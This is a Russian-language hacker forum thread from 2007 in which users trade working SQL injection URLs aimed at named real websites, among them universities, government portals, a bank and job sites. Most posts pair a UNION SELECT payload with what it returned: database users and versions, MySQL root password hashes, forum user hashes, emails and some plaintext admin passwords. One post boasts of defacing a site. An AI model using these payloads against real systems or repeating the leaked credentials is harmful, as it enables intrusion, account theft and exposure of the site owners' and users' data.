SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.galerialeme.com/exposicoes_textos.php?lang=ing&id=88&text_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
    [email protected]:4.0.27-locaweb-log:galerialeme
    Code:
    http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*&id=11
    pierre_keller@localhost:4.1.22-standard-log:pierre_keller
    Code:
    http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,aes_decrypt(aes_encrypt(login,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7,8,9,10,11,12+from+users/*&id=11
    keller:helioflex pierre:cachou
    Code:
    http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*
    root@localhost:4.0.26-nt:nomen
    Code:
    http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user,0x3a,password)+from+mysql.user/*
    root:1e30d6d6558d5312
    Code:
    http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*
    [email protected]:5.0.32-Debian_7etch1-log:doolao
    Code:
    http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_email),5,6,7,8,9+from+phpbb_users/*
    весомый вывод =) да и портал популярный
     
    4 people like this.
  2. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3a,version(),0x3a,database()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
    root@pm9:4.0.24:lawf
    Code:
    http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+mysql.user+limit+0,1/*
    root:17f62162237a6ce9
    Code:
    http://www.cultspace.org/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*
    cultspac_root@localhost:4.1.22-standard-log:cultspac_production
    Code:
    http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
    escort@localhost:4.1.20-log:escort_escort
    Code:
    http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(username,0x3a,user_password,0x3a,user_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/phpbb_users/*
    escortenpriveontvangst:5d1b83c5157b695ff205ab741e4a2609:[email protected]
    Code:
    http://www.nightnday.org/detail.php?list_id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    atom_nightnday@localhost:5.0.22:nightnday
     
    3 people like this.
  3. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    admin KAPACb
     
    5 people like this.
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    raum.ru

    http://www.raum.ru/articles.php?id=-1'+union+select+1,2,3,4,5,concat(name,0x3a,password,0x3a,icq_number),7,8+from+vitz_forums.ibf_members/*

    логин\хеш\уин используется базе, что и на vitz.ru , скулю к которому я выкладывал ранее.
    http://rapidshare.com/files/62099632/hashes.rar.html - тут расшифровка хешей ( спасибо delay(0)'ю )

    -------------------------------------------------------------

    externat.kspu.ru

    http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(version(),0x2F,database(),0x2F,user())/*

    4.0.24_Debian-10sarge2-log/externat/root@localhost


    http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(user_login,0x2F,user_password)+from+users+limit+0,1/*

    логин\хеш
     
    2 people like this.
  5. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    УкрТяжМет

    форум почитателей тяжелой музыки :)


    http://utm.in.ua/bands.php?mode=band&bid=-1319+union+select+1,concat_ws(0x3C62723E,username,user_icq,user_password,user_email),3,4,5,char(0x63,0x72,0x61,0x63,0x6b,0x65,0x64,0x20,0x62,0x79,0x20,0x66,0x6f,0x62,0x6f,0x66,0x6f,0x62,0x20,0xa9,0x20,0x28,0x41,0x6e,0x74,0x69,0x63,0x68,0x61,0x74,0x29),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+utm_users+limit+4814,1/*

    ;)
     
    2 people like this.
  6. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    Code:
    http://www.marimedia.ru/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt,converge_email),6,7,8,9,10,11+from+marimediaru_forum.ibf_members_converge+limit+0,1
    http://www.castledragmire.com/ragnarok/forums/forum.php?id=-1+union+select+1,2,concat_ws(0x203a20,name,password,icq,email),4,5,6,7,8,9,10+from+users/*
     
    2 people like this.
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    webdive.ru

    http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(version(),0x3a,database(),0x3a,user()),2/*

    5.0.27:nas3ru_dive:[email protected]


    http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(name,0x2F,pass),2+from+fuser+limit+0,1/*

    логин\пароль не хешированный ))
     
    1 person likes this.
  8. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
    root@localhost:4.0.20-log:kodu
    Code:
    http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user,0x3a,password),5+from+mysql.user/*
    root:157cda3a54492a1e
    phpgw:157cda3a54492a1e
    admin:73a3bfe82d187e5b
    phpgroupware:1a23abc3400d85c1
    Code:
    http://www.onlineitools.com/nl/nl-archive.php?bus_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*&list_id=1
    4.1.9-standard-log
    Code:
    http://www.gtreview.com/events/event_detail.php?List_ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
    exporta@localhost:4.1.20-log:dbExporta
    Code:
    http://202.205.109.23/new_wish/new_word.php?info_kind=2&list_id=-1+union+select+1,2,3,4,concat(user,0x3a,password)+from+mysql.user/*
    root:0af0288503451485
    Code:
    http://www.librariacarter.ro/edituri.php?e_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
    libraria@localhost:4.1.20:libraria
    Code:
    http://www.agenda.unizh.ch/liste.php?list_type=reihe&list_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6,aes_decrypt(aes_encrypt(database(),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,aes_decrypt(aes_encrypt(version(),0x71),0x71),36,37,38,39,40,41,42/*
    [email protected] 5.0.18-Max ibis
    Code:
    http://www.mercatigenerali.org/eventi_detail.php?e_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*
    [email protected]:4.0.27-standard-log:Sql68148_1
     
    1 person likes this.
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    4job.ru

    http://www.4job.ru/?pg_id=-1+union+select+concat(version(),0x2F,database(),0x2F,user())

    4.1.22/job4/job4@localhost



    http://www.4job.ru/?pg_id=-1+union+select+concat(login,0x2F,password)+from+users+limit+1,1

    логин/пароль
    admin/999000

    -------------------------------------------------------------------

    http://www.professia.ru/res_search.php?ID=-2+union+select+concat(version(),0x2F,database(),0x2F,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

    4.1.14-log/profess9_profess9/profess9_profess@localhost
     
    1 person likes this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    rabotka.ru

    http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(version(),0x2F,database(),0x2F,user())

    5.0.45/kikkas_job/kikkas@localhost


    http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(id,0x2F,name,0x2F,parol)+from+kikkas_job.webiusers+limit+0,1

    ид\имя\пароль не хеш. в <title>

    --------------------------------------------------------------

    minerjob.ru

    http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(version(),0x2F,database(),0x2F,user())/*

    5.0.32-Debian_7etch1-log/jobnet_mine/[email protected]


    http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(first_name,0x2F,email,0x2F,pwd)+from+users+limit+1,1/*

    имя\мейл\пароль не хеш.
     
  11. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.nhia.edu/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(version(),0x33a,user()),1),1),22,33,44,55,66,77,1,1,1,1,1,1,1,1+from+news/*

    http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,host,password,user,5,6,7,8,9,11,12,13,14,15+from+mysql.user+limit+0,1/*

    http://gopanthers.fit.edu/sports_info/view.php?id=-1+union+select+1,2,current_time(),version()/*
     
    #3331 *D1VER, 18 Oct 2007
    Last edited: 18 Oct 2007
    1 person likes this.
  12. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.hostingdirectory.us/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/**
    Code:
    http://www.armagh.gov.uk/show_council_department.php?dis=whoswho&show_sub=7&department_id=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10/*
     
    #3332 SWAT, 18 Oct 2007
    Last edited: 18 Oct 2007
    2 people like this.
  13. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.eng.wayne.edu/page.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(version(),0x33a,user(),0x3a,0x3a,id,0x3a,accessid),1),1),3,4,5,7+from+users/*
     
    1 person likes this.
  14. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    storage:*0F92CFEE8E9D2DAB2209AC88700985F6425EC4A1
    carlo:47ffb440cc2afb7bba618a02bd25741e
    [email protected]:47ffb440cc2afb7bba618a02bd25741e
    adam:f5489f1da0df19ee7ec09eb721501c3e
    wilson:05199deca16614131327f2c3fea9031c
    admin:e73833d10128caa0ecde2964b0323522 hash md5()
    admin:dinesh1
    "дефнул" http://www.basketball.com.np/news.php?id=26
    скрин http://fu2reteam.org/bastetball.gif
     
    1 person likes this.
  15. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Code:
    http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,database()/*
    http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,user()/*
    http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,version()/*
     
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.tete.fi/regsystem/event.php?e_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*
    [email protected]:4.0.27-standard-log:tetefi
    Code:
    http://www.cablemaster.ru/SHOP/shp_warlist.php?action=list&b_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
    4.1.18-log root:*F50E7C5E4FEF168E91C3573602248FD8CA82571A
    Code:
    http://www.ohot-prostory.ru/show_b.php?b_id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&type=2
    4.1.18-log
    Code:
    http://www.cjes.ru/actions/action.php?p_id=-1'/**/union/**/select/**/1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9/*
    4.1.18
    Code:
    http://afisha.newacropol.ru/showplace.php?p_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*
    [email protected]:4.1.22-log:afisha
    Code:
    http://www.melan.gazinter.net/Forum/view.php?m_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
    melandb@localhost:4.1.22-log:melan
    Code:
    http://www.vesakday.net/vesak50/messages_details.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9/*&trnslang=th
    vesak50@localhost:5.1.17-beta-log:vesak50
    Code:
    http://cen.iatp.org.ua/virtual/job/boardua/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
    [email protected]:4.1.22:cen
    Code:
    http://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
    admkmgovua@localhost:4.0.27:admkmgovua
     
    3 people like this.
  17. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Банк "Объединенный Капитал"
    Version: 4.1.20-lk-log
    User: okbankru_site@localchost
     
    3 people like this.
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    ankil.ru

    http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,concat(username,0x2F,password),3,4,5,6,7,8,9,10,11,12,13+from+dokeos_main.user+limit+0,1/*

    логин\хеш

    Еще есть таблица юзеров форума itaf_user в базе ita-forum, но запрос к ней выводит ошибку вероятно из-за тире в имени базы. Что с этим делать не знаю. Подскажите кто знает
     
  19. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
     
  20. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Может и так, но на скуль

    http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+ita-forum.itaf_user/*

    ошибка

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3


    ------------------------------------------------------------------
     
    1 person likes this.
Thread Status:
Not open for further replies.